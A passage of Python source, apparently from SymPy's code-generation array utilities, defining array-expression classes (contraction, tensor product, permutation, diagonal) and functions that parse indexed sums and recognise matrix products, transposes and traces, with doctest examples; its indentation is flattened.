def contraction_indices(self):
return self.args[1:]
def _contraction_indices_to_components(self):
expr = self.expr
if not isinstance(expr, CodegenArrayTensorProduct):
raise NotImplementedError("only for contractions of tensor products")
ranks = expr.subranks
mapping = {}
counter = 0
for i, rank in enumerate(ranks):
for j in range(rank):
mapping[counter] = (i, j)
counter += 1
return mapping
def sort_args_by_name(self):
"""
Sort arguments in the tensor product so that their order is lexicographical.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> C = MatrixSymbol("C", N, N)
>>> D = MatrixSymbol("D", N, N)
>>> cg = CodegenArrayContraction.from_MatMul(C*D*A*B)
>>> cg
CodegenArrayContraction(CodegenArrayTensorProduct(C, D, A, B), (1, 2), (3, 4), (5, 6))
>>> cg.sort_args_by_name()
CodegenArrayContraction(CodegenArrayTensorProduct(A, B, C, D), (0, 7), (1, 2), (5, 6))
"""
expr = self.expr
if not isinstance(expr, CodegenArrayTensorProduct):
return self
args = expr.args
sorted_data = sorted(enumerate(args), key=lambda x: default_sort_key(x[1]))
pos_sorted, args_sorted = zip(*sorted_data)
reordering_map = {i: pos_sorted.index(i) for i, arg in enumerate(args)}
contraction_tuples = self._get_contraction_tuples()
contraction_tuples = [[(reordering_map[j], k) for j, k in i] for i in contraction_tuples]
c_tp = CodegenArrayTensorProduct(*args_sorted)
new_contr_indices = self._contraction_tuples_to_contraction_indices(
c_tp,
contraction_tuples
)
return CodegenArrayContraction(c_tp, *new_contr_indices)
def _get_contraction_links(self):
r"""
Returns a dictionary of links between arguments in the tensor product
being contracted.
See the example for an explanation of the values.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> C = MatrixSymbol("C", N, N)
>>> D = MatrixSymbol("D", N, N)
Matrix multiplications are pairwise contractions between neighboring
matrices:
`A_{ij} B_{jk} C_{kl} D_{lm}`
>>> cg = CodegenArrayContraction.from_MatMul(A*B*C*D)
>>> cg
CodegenArrayContraction(CodegenArrayTensorProduct(A, B, C, D), (1, 2), (3, 4), (5, 6))
>>> cg._get_contraction_links()
{0: {1: (1, 0)}, 1: {0: (0, 1), 1: (2, 0)}, 2: {0: (1, 1), 1: (3, 0)}, 3: {0: (2, 1)}}
This dictionary is interpreted as follows: argument in position 0 (i.e.
matrix `A`) has its second index (i.e. 1) contracted to `(1, 0)`, that
is argument in position 1 (matrix `B`) on the first index slot of `B`,
this is the contraction provided by the index `j` from `A`.
The argument in position 1 (that is, matrix `B`) has two contractions,
the ones provided by the indices `j` and `k`, respectively the first
and second indices (0 and 1 in the sub-dict). The link `(0, 1)` and
`(2, 0)` respectively. `(0, 1)` is the index slot 1 (the 2nd) of
argument in position 0 (that is, `A_{\ldot j}`), and so on.
"""
args, dlinks = _get_contraction_links([self], self.subranks, *self.contraction_indices)
return dlinks
@staticmethod
def from_MatMul(expr):
args_nonmat = []
args = []
contractions = []
for arg in expr.args:
if isinstance(arg, MatrixExpr):
args.append(arg)
else:
args_nonmat.append(arg)
contractions = [(2*i+1, 2*i+2) for i in range(len(args)-1)]
return Mul.fromiter(args_nonmat)*CodegenArrayContraction(
CodegenArrayTensorProduct(*args),
*contractions
)
def get_shape(expr):
if hasattr(expr, "shape"):
return expr.shape
return ()
class CodegenArrayTensorProduct(_CodegenArrayAbstract):
r"""
Class to represent the tensor product of array-like objects.
"""
def __new__(cls, *args):
args = [_sympify(arg) for arg in args]
args = cls._flatten(args)
ranks = [get_rank(arg) for arg in args]
if len(args) == 1:
return args[0]
# If there are contraction objects inside, transform the whole
# expression into `CodegenArrayContraction`:
contractions = {i: arg for i, arg in enumerate(args) if isinstance(arg, CodegenArrayContraction)}
if contractions:
cumulative_ranks = list(accumulate([0] + ranks))[:-1]
tp = cls(*[arg.expr if isinstance(arg, CodegenArrayContraction) else arg for arg in args])
contraction_indices = [tuple(cumulative_ranks[i] + k for k in j) for i, arg in contractions.items() for j in arg.contraction_indices]
return CodegenArrayContraction(tp, *contraction_indices)
#newargs = [i for i in args if hasattr(i, "shape")]
#coeff = reduce(lambda x, y: x*y, [i for i in args if not hasattr(i, "shape")], S.One)
#newargs[0] *= coeff
obj = Basic.__new__(cls, *args)
obj._subranks = ranks
shapes = [get_shape(i) for i in args]
if any(i is None for i in shapes):
obj._shape = None
else:
obj._shape = tuple(j for i in shapes for j in i)
return obj
@classmethod
def _flatten(cls, args):
args = [i for arg in args for i in (arg.args if isinstance(arg, cls) else [arg])]
return args
class CodegenArrayElementwiseAdd(_CodegenArrayAbstract):
r"""
Class for elementwise array additions.
"""
def __new__(cls, *args):
args = [_sympify(arg) for arg in args]
obj = Basic.__new__(cls, *args)
ranks = [get_rank(arg) for arg in args]
ranks = list(set(ranks))
if len(ranks) != 1:
raise ValueError("summing arrays of different ranks")
obj._subranks = ranks
shapes = [arg.shape for arg in args]
if len(set([i for i in shapes if i is not None])) > 1:
raise ValueError("mismatching shapes in addition")
if any(i is None for i in shapes):
obj._shape = None
else:
obj._shape = shapes[0]
return obj
class CodegenArrayPermuteDims(_CodegenArrayAbstract):
r"""
Class to represent permutation of axes of arrays.
Examples
========
>>> from sympy.codegen.array_utils import CodegenArrayPermuteDims
>>> from sympy import MatrixSymbol
>>> M = MatrixSymbol("M", 3, 3)
>>> cg = CodegenArrayPermuteDims(M, [1, 0])
The object ``cg`` represents the transposition of ``M``, as the permutation
``[1, 0]`` will act on its indices by switching them:
`M_{ij} \Rightarrow M_{ji}`
This is evident when transforming back to matrix form:
>>> from sympy.codegen.array_utils import recognize_matrix_expression
>>> recognize_matrix_expression(cg)
M.T
>>> N = MatrixSymbol("N", 3, 2)
>>> cg = CodegenArrayPermuteDims(N, [1, 0])
>>> cg.shape
(2, 3)
"""
def __new__(cls, expr, permutation):
from sympy.combinatorics import Permutation
expr = _sympify(expr)
permutation = Permutation(permutation)
plist = permutation.array_form
if plist == sorted(plist):
return expr
obj = Basic.__new__(cls, expr, permutation)
obj._subranks = [get_rank(expr)]
shape = expr.shape
if shape is None:
obj._shape = None
else:
obj._shape = tuple(shape[permutation(i)] for i in range(len(shape)))
return obj
@property
def expr(self):
return self.args[0]
@property
def permutation(self):
return self.args[1]
def nest_permutation(self):
r"""
Nest the permutation down the expression tree.
Examples
========
>>> from sympy.codegen.array_utils import (CodegenArrayPermuteDims, CodegenArrayTensorProduct, nest_permutation)
>>> from sympy import MatrixSymbol
>>> from sympy.combinatorics import Permutation
>>> M = MatrixSymbol("M", 3, 3)
>>> N = MatrixSymbol("N", 3, 3)
>>> cg = CodegenArrayPermuteDims(CodegenArrayTensorProduct(M, N), [1, 0, 3, 2])
>>> cg
CodegenArrayPermuteDims(CodegenArrayTensorProduct(M, N), (0 1)(2 3))
>>> nest_permutation(cg)
CodegenArrayTensorProduct(CodegenArrayPermuteDims(M, (0 1)), CodegenArrayPermuteDims(N, (0 1)))
In ``cg`` both ``M`` and ``N`` are transposed. The cyclic
representation of the permutation after the tensor product is
`(0 1)(2 3)`. After nesting it down the expression tree, the usual
transposition permutation `(0 1)` appears.
"""
expr = self.expr
if isinstance(expr, CodegenArrayTensorProduct):
# Check if the permutation keeps the subranks separated:
subranks = expr.subranks
subrank = expr.subrank()
l = list(range(subrank))
p = [self.permutation(i) for i in l]
dargs = {}
counter = 0
for i, arg in zip(subranks, expr.args):
p0 = p[counter:counter+i]
counter += i
s0 = sorted(p0)
if not all([s0[j+1]-s0[j] == 1 for j in range(len(s0)-1)]):
# Cross-argument permutations, impossible to nest the object:
return self
subpermutation = [p0.index(j) for j in s0]
dargs[s0[0]] = CodegenArrayPermuteDims(arg, subpermutation)
# Read the arguments sorting the according to the keys of the dict:
args = [dargs[i] for i in sorted(dargs)]
return CodegenArrayTensorProduct(*args)
elif isinstance(expr, CodegenArrayContraction):
# Invert tree hierarchy: put the contraction above.
cycles = self.permutation.cyclic_form
newcycles = CodegenArrayContraction._convert_outer_indices_to_inner_indices(expr, *cycles)
newpermutation = Permutation(newcycles)
new_contr_indices = [tuple(newpermutation(j) for j in i) for i in expr.contraction_indices]
return CodegenArrayContraction(CodegenArrayPermuteDims(expr.expr, newpermutation), *new_contr_indices)
elif isinstance(expr, CodegenArrayElementwiseAdd):
return CodegenArrayElementwiseAdd(*[CodegenArrayPermuteDims(arg, self.permutation) for arg in expr.args])
return self
def nest_permutation(expr):
if isinstance(expr, CodegenArrayPermuteDims):
return expr.nest_permutation()
else:
return expr
class CodegenArrayDiagonal(_CodegenArrayAbstract):
r"""
Class to represent the diagonal operator.
In a 2-dimensional array it returns the diagonal, this looks like the
operation:
`A_{ij} \rightarrow A_{ii}`
The diagonal over axes 1 and 2 (the second and third) of the tensor product
of two 2-dimensional arrays `A \otimes B` is
`\Big[ A_{ab} B_{cd} \Big]_{abcd} \rightarrow \Big[ A_{ai} B_{id} \Big]_{adi}`
In this last example the array expression has been reduced from
4-dimensional to 3-dimensional. Notice that no contraction has occurred,
rather there is a new index `i` for the diagonal, contraction would have
reduced the array to 2 dimensions.
Notice that the diagonalized out dimensions are added as new dimensions at
the end of the indices.
"""
def __new__(cls, expr, *diagonal_indices):
expr = _sympify(expr)
diagonal_indices = [Tuple(*sorted(i)) for i in diagonal_indices]
if isinstance(expr, CodegenArrayDiagonal):
return cls._flatten(expr, *diagonal_indices)
shape = expr.shape
if shape is not None:
diagonal_indices = [i for i in diagonal_indices if len(i) > 1]
cls._validate(expr, *diagonal_indices)
#diagonal_indices = cls._remove_trivial_dimensions(shape, *diagonal_indices)
# Get new shape:
shp1 = tuple(shp for i,shp in enumerate(shape) if not any(i in j for j in diagonal_indices))
shp2 = tuple(shape[i[0]] for i in diagonal_indices)
shape = shp1 + shp2
if len(diagonal_indices) == 0:
return expr
obj = Basic.__new__(cls, expr, *diagonal_indices)
obj._subranks = _get_subranks(expr)
obj._shape = shape
return obj
@staticmethod
def _validate(expr, *diagonal_indices):
# Check that no diagonalization happens on indices with mismatched
# dimensions:
shape = expr.shape
for i in diagonal_indices:
if len(set(shape[j] for j in i)) != 1:
raise ValueError("diagonalizing indices of different dimensions")
@staticmethod
def _remove_trivial_dimensions(shape, *diagonal_indices):
return [tuple(j for j in i) for i in diagonal_indices if shape[i[0]] != 1]
@property
def expr(self):
return self.args[0]
@property
def diagonal_indices(self):
return self.args[1:]
@staticmethod
def _flatten(expr, *outer_diagonal_indices):
inner_diagonal_indices = expr.diagonal_indices
all_inner = [j for i in inner_diagonal_indices for j in i]
all_inner.sort()
# TODO: add API for total rank and cumulative rank:
total_rank = get_rank(expr)
inner_rank = len(all_inner)
outer_rank = total_rank - inner_rank
shifts = [0 for i in range(outer_rank)]
counter = 0
pointer = 0
for i in range(outer_rank):
while pointer < inner_rank and counter >= all_inner[pointer]:
counter += 1
pointer += 1
shifts[i] += pointer
counter += 1
outer_diagonal_indices = tuple(tuple(shifts[j] + j for j in i) for i in outer_diagonal_indices)
diagonal_indices = inner_diagonal_indices + outer_diagonal_indices
return CodegenArrayDiagonal(expr.expr, *diagonal_indices)
@classmethod
def _push_indices_down(cls, diagonal_indices, indices):
flattened_contraction_indices = [j for i in diagonal_indices for j in i[1:]]
flattened_contraction_indices.sort()
transform = _build_push_indices_down_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
@classmethod
def _push_indices_up(cls, diagonal_indices, indices):
flattened_contraction_indices = [j for i in diagonal_indices for j in i[1:]]
flattened_contraction_indices.sort()
transform = _build_push_indices_up_func_transformation(flattened_contraction_indices)
return _apply_recursively_over_nested_lists(transform, indices)
def transform_to_product(self):
from sympy import ask, Q
diagonal_indices = self.diagonal_indices
if isinstance(self.expr, CodegenArrayContraction):
# invert Diagonal and Contraction:
diagonal_down = CodegenArrayContraction._push_indices_down(
self.expr.contraction_indices,
diagonal_indices
)
newexpr = CodegenArrayDiagonal(
self.expr.expr,
*diagonal_down
).transform_to_product()
contraction_up = newexpr._push_indices_up(
diagonal_down,
self.expr.contraction_indices
)
return CodegenArrayContraction(
newexpr,
*contraction_up
)
if not isinstance(self.expr, CodegenArrayTensorProduct):
return self
args = list(self.expr.args)
# TODO: unify API
subranks = [get_rank(i) for i in args]
# TODO: unify API
mapping = _get_mapping_from_subranks(subranks)
new_contraction_indices = []
drop_diagonal_indices = []
for indl, links in enumerate(diagonal_indices):
if len(links) > 2:
continue
# Also consider the case of diagonal matrices being contracted:
current_dimension = self.expr.shape[links[0]]
if current_dimension == 1:
drop_diagonal_indices.append(indl)
continue
tuple_links = [mapping[i] for i in links]
arg_indices, arg_positions = zip(*tuple_links)
if len(arg_indices) != len(set(arg_indices)):
# Maybe trace should be supported?
raise NotImplementedError
args_updates = {}
count_nondiagonal = 0
last = None
expression_is_square = False
# Check that all args are vectors:
for arg_ind, arg_pos in tuple_links:
mat = args[arg_ind]
if 1 in mat.shape and mat.shape != (1, 1):
args_updates[arg_ind] = DiagMatrix(mat)
last = arg_ind
else:
expression_is_square = True
if not ask(Q.diagonal(mat)):
count_nondiagonal += 1
if count_nondiagonal > 1:
break
if count_nondiagonal > 1:
continue
# TODO: if count_nondiagonal == 0 then the sub-expression can be recognized as HadamardProduct.
for arg_ind, newmat in args_updates.items():
if not expression_is_square and arg_ind == last:
continue
#pass
args[arg_ind] = newmat
drop_diagonal_indices.append(indl)
new_contraction_indices.append(links)
new_diagonal_indices = CodegenArrayContraction._push_indices_up(
new_contraction_indices,
[e for i, e in enumerate(diagonal_indices) if i not in drop_diagonal_indices]
)
return CodegenArrayDiagonal(
CodegenArrayContraction(
CodegenArrayTensorProduct(*args),
*new_contraction_indices
),
*new_diagonal_indices
)
def get_rank(expr):
if isinstance(expr, (MatrixExpr, MatrixElement)):
return 2
if isinstance(expr, _CodegenArrayAbstract):
return expr.subrank()
if isinstance(expr, NDimArray):
return expr.rank()
if isinstance(expr, Indexed):
return expr.rank
if isinstance(expr, IndexedBase):
shape = expr.shape
if shape is None:
return -1
else:
return len(shape)
if isinstance(expr, _RecognizeMatOp):
return expr.rank()
if isinstance(expr, _RecognizeMatMulLines):
return expr.rank()
return 0
def _get_subranks(expr):
if isinstance(expr, _CodegenArrayAbstract):
return expr.subranks
else:
return [get_rank(expr)]
def _get_mapping_from_subranks(subranks):
mapping = {}
counter = 0
for i, rank in enumerate(subranks):
for j in range(rank):
mapping[counter] = (i, j)
counter += 1
return mapping
def _get_contraction_links(args, subranks, *contraction_indices):
mapping = _get_mapping_from_subranks(subranks)
contraction_tuples = [[mapping[j] for j in i] for i in contraction_indices]
dlinks = defaultdict(dict)
for links in contraction_tuples:
if len(links) == 2:
(arg1, pos1), (arg2, pos2) = links
dlinks[arg1][pos1] = (arg2, pos2)
dlinks[arg2][pos2] = (arg1, pos1)
continue
return args, dict(dlinks)
def _sort_contraction_indices(pairing_indices):
pairing_indices = [Tuple(*sorted(i)) for i in pairing_indices]
pairing_indices.sort(key=lambda x: min(x))
return pairing_indices
def _get_diagonal_indices(flattened_indices):
axes_contraction = defaultdict(list)
for i, ind in enumerate(flattened_indices):
if isinstance(ind, (int, Integer)):
# If the indices is a number, there can be no diagonal operation:
continue
axes_contraction[ind].append(i)
axes_contraction = {k: v for k, v in axes_contraction.items() if len(v) > 1}
# Put the diagonalized indices at the end:
ret_indices = [i for i in flattened_indices if i not in axes_contraction]
diag_indices = list(axes_contraction)
diag_indices.sort(key=lambda x: flattened_indices.index(x))
diagonal_indices = [tuple(axes_contraction[i]) for i in diag_indices]
ret_indices += diag_indices
ret_indices = tuple(ret_indices)
return diagonal_indices, ret_indices
def _get_argindex(subindices, ind):
for i, sind in enumerate(subindices):
if ind == sind:
return i
if isinstance(sind, (set, frozenset)) and ind in sind:
return i
raise IndexError("%s not found in %s" % (ind, subindices))
def _codegen_array_parse(expr):
if isinstance(expr, Sum):
function = expr.function
summation_indices = expr.variables
subexpr, subindices = _codegen_array_parse(function)
# Check dimensional consistency:
shape = subexpr.shape
if shape:
for ind, istart, iend in expr.limits:
i = _get_argindex(subindices, ind)
if istart != 0 or iend+1 != shape[i]:
raise ValueError("summation index and array dimension mismatch: %s" % ind)
contraction_indices = []
subindices = list(subindices)
if isinstance(subexpr, CodegenArrayDiagonal):
diagonal_indices = list(subexpr.diagonal_indices)
dindices = subindices[-len(diagonal_indices):]
subindices = subindices[:-len(diagonal_indices)]
for index in summation_indices:
if index in dindices:
position = dindices.index(index)
contraction_indices.append(diagonal_indices[position])
diagonal_indices[position] = None
diagonal_indices = [i for i in diagonal_indices if i is not None]
for i, ind in enumerate(subindices):
if ind in summation_indices:
pass
if diagonal_indices:
subexpr = CodegenArrayDiagonal(subexpr.expr, *diagonal_indices)
else:
subexpr = subexpr.expr
axes_contraction = defaultdict(list)
for i, ind in enumerate(subindices):
if ind in summation_indices:
axes_contraction[ind].append(i)
subindices[i] = None
for k, v in axes_contraction.items():
contraction_indices.append(tuple(v))
free_indices = [i for i in subindices if i is not None]
indices_ret = list(free_indices)
indices_ret.sort(key=lambda x: free_indices.index(x))
return CodegenArrayContraction(
subexpr,
*contraction_indices,
free_indices=free_indices
), tuple(indices_ret)
if isinstance(expr, Mul):
args, indices = zip(*[_codegen_array_parse(arg) for arg in expr.args])
# Check if there are KroneckerDelta objects:
kronecker_delta_repl = {}
for arg in args:
if not isinstance(arg, KroneckerDelta):
continue
# Diagonalize two indices:
i, j = arg.indices
kindices = set(arg.indices)
if i in kronecker_delta_repl:
kindices.update(kronecker_delta_repl[i])
if j in kronecker_delta_repl:
kindices.update(kronecker_delta_repl[j])
kindices = frozenset(kindices)
for index in kindices:
kronecker_delta_repl[index] = kindices
# Remove KroneckerDelta objects, their relations should be handled by
# CodegenArrayDiagonal:
newargs = []
newindices = []
for arg, loc_indices in zip(args, indices):
if isinstance(arg, KroneckerDelta):
continue
newargs.append(arg)
newindices.append(loc_indices)
flattened_indices = [kronecker_delta_repl.get(j, j) for i in newindices for j in i]
diagonal_indices, ret_indices = _get_diagonal_indices(flattened_indices)
tp = CodegenArrayTensorProduct(*newargs)
if diagonal_indices:
return (CodegenArrayDiagonal(tp, *diagonal_indices), ret_indices)
else:
return tp, ret_indices
if isinstance(expr, MatrixElement):
indices = expr.args[1:]
diagonal_indices, ret_indices = _get_diagonal_indices(indices)
if diagonal_indices:
return (CodegenArrayDiagonal(expr.args[0], *diagonal_indices), ret_indices)
else:
return expr.args[0], ret_indices
if isinstance(expr, Indexed):
indices = expr.indices
diagonal_indices, ret_indices = _get_diagonal_indices(indices)
if diagonal_indices:
return (CodegenArrayDiagonal(expr.base, *diagonal_indices), ret_indices)
else:
return expr.args[0], ret_indices
if isinstance(expr, IndexedBase):
raise NotImplementedError
if isinstance(expr, KroneckerDelta):
return expr, expr.indices
if isinstance(expr, Add):
args, indices = zip(*[_codegen_array_parse(arg) for arg in expr.args])
args = list(args)
# Check if all indices are compatible. Otherwise expand the dimensions:
index0set = set(indices[0])
index0 = indices[0]
for i in range(1, len(args)):
if set(indices[i]) != index0set:
raise NotImplementedError("indices must be the same")
permutation = Permutation([index0.index(j) for j in indices[i]])
# Perform index permutations:
args[i] = CodegenArrayPermuteDims(args[i], permutation)
return CodegenArrayElementwiseAdd(*args), index0
return expr, ()
raise NotImplementedError("could not recognize expression %s" % expr)
def _parse_matrix_expression(expr):
if isinstance(expr, MatMul):
args_nonmat = []
args = []
contractions = []
for arg in expr.args:
if isinstance(arg, MatrixExpr):
args.append(arg)
else:
args_nonmat.append(arg)
contractions = [(2*i+1, 2*i+2) for i in range(len(args)-1)]
return Mul.fromiter(args_nonmat)*CodegenArrayContraction(
CodegenArrayTensorProduct(*[_parse_matrix_expression(arg) for arg in args]),
*contractions
)
elif isinstance(expr, MatAdd):
return CodegenArrayElementwiseAdd(
*[_parse_matrix_expression(arg) for arg in expr.args]
)
elif isinstance(expr, Transpose):
return CodegenArrayPermuteDims(
_parse_matrix_expression(expr.args[0]), [1, 0]
)
else:
return expr
def parse_indexed_expression(expr, first_indices=None):
r"""
Parse indexed expression into a form useful for code generation.
Examples
========
>>> from sympy.codegen.array_utils import parse_indexed_expression
>>> from sympy import MatrixSymbol, Sum, symbols
>>> from sympy.combinatorics import Permutation
>>> i, j, k, d = symbols("i j k d")
>>> M = MatrixSymbol("M", d, d)
>>> N = MatrixSymbol("N", d, d)
Recognize the trace in summation form:
>>> expr = Sum(M[i, i], (i, 0, d-1))
>>> parse_indexed_expression(expr)
CodegenArrayContraction(M, (0, 1))
Recognize the extraction of the diagonal by using the same index `i` on
both axes of the matrix:
>>> expr = M[i, i]
>>> parse_indexed_expression(expr)
CodegenArrayDiagonal(M, (0, 1))
This function can help perform the transformation expressed in two
different mathematical notations as:
`\sum_{j=0}^{N-1} A_{i,j} B_{j,k} \Longrightarrow \mathbf{A}\cdot \mathbf{B}`
Recognize the matrix multiplication in summation form:
>>> expr = Sum(M[i, j]*N[j, k], (j, 0, d-1))
>>> parse_indexed_expression(expr)
CodegenArrayContraction(CodegenArrayTensorProduct(M, N), (1, 2))
Specify that ``k`` has to be the starting index:
>>> parse_indexed_expression(expr, first_indices=[k])
CodegenArrayPermuteDims(CodegenArrayContraction(CodegenArrayTensorProduct(M, N), (1, 2)), (0 1))
"""
result, indices = _codegen_array_parse(expr)
if not first_indices:
return result
for i in first_indices:
if i not in indices:
first_indices.remove(i)
#raise ValueError("index %s not found or not a free index" % i)
first_indices.extend([i for i in indices if i not in first_indices])
permutation = [first_indices.index(i) for i in indices]
return CodegenArrayPermuteDims(result, permutation)
def _has_multiple_lines(expr):
if isinstance(expr, _RecognizeMatMulLines):
return True
if isinstance(expr, _RecognizeMatOp):
return expr.multiple_lines
return False
class _RecognizeMatOp(object):
"""
Class to help parsing matrix multiplication lines.
"""
def __init__(self, operator, args):
self.operator = operator
self.args = args
if any(_has_multiple_lines(arg) for arg in args):
multiple_lines = True
else:
multiple_lines = False
self.multiple_lines = multiple_lines
def rank(self):
if self.operator == Trace:
return 0
# TODO: check
return 2
def __repr__(self):
op = self.operator
if op == MatMul:
s = "*"
elif op == MatAdd:
s = "+"
else:
s = op.__name__
return "_RecognizeMatOp(%s, %s)" % (s, repr(self.args))
return "_RecognizeMatOp(%s)" % (s.join(repr(i) for i in self.args))
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
if self.operator != other.operator:
return False
if self.args != other.args:
return False
return True
def __iter__(self):
return iter(self.args)
class _RecognizeMatMulLines(list):
"""
This class handles multiple parsed multiplication lines.
"""
def __new__(cls, args):
if len(args) == 1:
return args[0]
return list.__new__(cls, args)
def rank(self):
return reduce(lambda x, y: x*y, [get_rank(i) for i in self], S.One)
def __repr__(self):
return "_RecognizeMatMulLines(%s)" % super(_RecognizeMatMulLines, self).__repr__()
def _support_function_tp1_recognize(contraction_indices, args):
if not isinstance(args, list):
args = [args]
subranks = [get_rank(i) for i in args]
coeff = reduce(lambda x, y: x*y, [arg for arg, srank in zip(args, subranks) if srank == 0], S.One)
mapping = _get_mapping_from_subranks(subranks)
reverse_mapping = {v:k for k, v in mapping.items()}
args, dlinks = _get_contraction_links(args, subranks, *contraction_indices)
flatten_contractions = [j for i in contraction_indices for j in i]
total_rank = sum(subranks)
# TODO: turn `free_indices` into a list?
free_indices = {i: i for i in range(total_rank) if i not in flatten_contractions}
return_list = []
while dlinks:
if free_indices:
first_index, starting_argind = min(free_indices.items(), key=lambda x: x[1])
free_indices.pop(first_index)
starting_argind, starting_pos = mapping[starting_argind]
else:
# Maybe a Trace
first_index = None
starting_argind = min(dlinks)
starting_pos = 0
current_argind, current_pos = starting_argind, starting_pos
matmul_args = []
last_index = None
while True:
elem = args[current_argind]
if current_pos == 1:
elem = _RecognizeMatOp(Transpose, [elem])
matmul_args.append(elem)
other_pos = 1 - current_pos
if current_argind not in dlinks:
other_absolute = reverse_mapping[current_argind, other_pos]
free_indices.pop(other_absolute, None)
break
link_dict = dlinks.pop(current_argind)
if other_pos not in link_dict:
if free_indices:
last_index = [i for i, j in free_indices.items() if mapping[j] == (current_argind, other_pos)][0]
else:
last_index = None
break
if len(link_dict) > 2:
raise NotImplementedError("not a matrix multiplication line")
# Get the last element of `link_dict` as the next link. The last
# element is the correct start for trace expressions:
current_argind, current_pos = link_dict[other_pos]
if current_argind == starting_argind:
# This is a trace:
if len(matmul_args) > 1:
matmul_args = [_RecognizeMatOp(Trace, [_RecognizeMatOp(MatMul, matmul_args)])]
elif args[current_argind].shape != (1, 1):
matmul_args = [_RecognizeMatOp(Trace, matmul_args)]
break
dlinks.pop(starting_argind, None)
free_indices.pop(last_index, None)
return_list.append(_RecognizeMatOp(MatMul, matmul_args))
if coeff != 1:
# Let's inject the coefficient:
return_list[0].args.insert(0, coeff)
return _RecognizeMatMulLines(return_list)
def recognize_matrix_expression(expr):
r"""
Recognize matrix expressions in codegen objects.
If more than one matrix multiplication line have been detected, return a
list with the matrix expressions.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction, CodegenArrayTensorProduct
>>> from sympy.codegen.array_utils import recognize_matrix_expression, parse_indexed_expression
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> C = MatrixSymbol("C", N, N)
>>> D = MatrixSymbol("D", N, N)
>>> expr = Sum(A[i, j]*B[j, k], (j, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
A*B
>>> cg = parse_indexed_expression(expr, first_indices=[k])
>>> recognize_matrix_expression(cg)
(A*B).T
Transposition is detected:
>>> expr = Sum(A[j, i]*B[j, k], (j, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
A.T*B
>>> cg = parse_indexed_expression(expr, first_indices=[k])
>>> recognize_matrix_expression(cg)
(A.T*B).T
Detect the trace:
>>> expr = Sum(A[i, i], (i, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
Trace(A)
Recognize some more complex traces:
>>> expr = Sum(A[i, j]*B[j, i], (i, 0, N-1), (j, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
Trace(A*B)
More complicated expressions:
>>> expr = Sum(A[i, j]*B[k, j]*A[l, k], (j, 0, N-1), (k, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
A*B.T*A.T
Expressions constructed from matrix expressions do not contain literal
indices, the positions of free indices are returned instead:
>>> expr = A*B
>>> cg = CodegenArrayContraction.from_MatMul(expr)
>>> recognize_matrix_expression(cg)
A*B
If more than one line of matrix multiplications is detected, return
separate matrix multiplication factors:
>>> cg = CodegenArrayContraction(CodegenArrayTensorProduct(A, B, C, D), (1, 2), (5, 6))
>>> recognize_matrix_expression(cg)
[A*B, C*D]
The two lines have free indices at axes 0, 3 and 4, 7, respectively.
"""
# TODO: expr has to be a CodegenArray... type
rec = _recognize_matrix_expression(expr)
return _unfold_recognized_expr(rec)
def _recognize_matrix_expression(expr):
if isinstance(expr, CodegenArrayContraction):
# Apply some transformations:
expr = expr.flatten_contraction_of_diagonal()
expr = expr.split_multiple_contractions()
args = _recognize_matrix_expression(expr.expr)
contraction_indices = expr.contraction_indices
if isinstance(args, _RecognizeMatOp) and args.operator == MatAdd:
addends = []
for arg in args.args:
addends.append(_support_function_tp1_recognize(contraction_indices, arg))
return _RecognizeMatOp(MatAdd, addends)
elif isinstance(args, _RecognizeMatMulLines):
return _support_function_tp1_recognize(contraction_indices, args)
return _support_function_tp1_recognize(contraction_indices, [args])
elif isinstance(expr, CodegenArrayElementwiseAdd):
add_args = []
for arg in expr.args:
add_args.append(_recognize_matrix_expression(arg))
return _RecognizeMatOp(MatAdd, add_args)
elif isinstance(expr, (MatrixSymbol, IndexedBase)):
return expr
elif isinstance(expr, CodegenArrayPermuteDims):
if expr.permutation.array_form == [1, 0]:
return _RecognizeMatOp(Transpose, [_recognize_matrix_expression(expr.expr)])
elif isinstance(expr.expr, CodegenArrayTensorProduct):
ranks = expr.expr.subranks
newrange = [expr.permutation(i) for i in range(sum(ranks))]
newpos = []
counter = 0
for rank in ranks:
newpos.append(newrange[counter:counter+rank])
counter += rank
newargs = []
for pos, arg in zip(newpos, expr.expr.args):
if pos == sorted(pos):
newargs.append((_recognize_matrix_expression(arg), pos[0]))
elif len(pos) == 2:
newargs.append((_RecognizeMatOp(Transpose, [_recognize_matrix_expression(arg)]), pos[0]))
else:
raise NotImplementedError
newargs.sort(key=lambda x: x[1])
newargs = [i[0] for i in newargs]
return _RecognizeMatMulLines(newargs)
else:
raise NotImplementedError
elif isinstance(expr, CodegenArrayTensorProduct):
args = [_recognize_matrix_expression(arg) for arg in expr.args]
multiple_lines = [_has_multiple_lines(arg) for arg in args]
if any(multiple_lines):
if any(a.operator != MatAdd for i, a in enumerate(args) if multiple_lines[i] and isinstance(a, _RecognizeMatOp)):
raise NotImplementedError
getargs = lambda x: x.args if isinstance(x, _RecognizeMatOp) else list(x)
expand_args = [getargs(arg) if multiple_lines[i] else [arg] for i, arg in enumerate(args)]
it = itertools.product(*expand_args)
ret = _RecognizeMatOp(MatAdd, [_RecognizeMatMulLines([k for j in i for k in (j if isinstance(j, _RecognizeMatMulLines) else [j])]) for i in it])
return ret
return _RecognizeMatMulLines(args)
elif isinstance(expr, CodegenArrayDiagonal):
pexpr = expr.transform_to_product()
if expr == pexpr:
return expr
return _recognize_matrix_expression(pexpr)
